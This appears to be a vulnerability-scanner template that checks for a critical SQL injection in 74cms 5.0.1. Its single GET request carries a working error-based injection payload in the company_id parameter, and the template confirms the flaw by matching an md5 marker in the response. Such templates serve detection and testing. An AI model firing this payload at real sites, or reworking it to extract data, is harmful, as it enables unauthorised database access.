id: 74cms-sqli

info:
  name: 74cms Sql Injection
  author: princechaddha
  severity: critical
  description: A SQL injection vulnerability exists in 74cms 5.0.1 AjaxPersonalController.class.php.
  reference:
    - https://github.com/possib1e/vuln/issues/3
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-89
  metadata:
    max-request: 1
  tags: 74cms,sqli
variables:
  num: "999999999"

http:
  - method: GET
    path:
      - '{{BaseURL}}/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test") and extractvalue(1,concat(0x7e,md5({{num}}))) -- a'

    matchers:
      - type: word
        words:
          - '{{md5({{num}})}}'
        part: body
# digest: 4b0a00483046022100b4af76812dcbed8d0285db8f2f8cd4ad440b26ec8c499569b81d21bdc834f411022100c975e91fb384050304c57f9329f2f066bd37c3b122bbd68ceaed94cfff102441:922c64590222798bb761d5b6d8e72950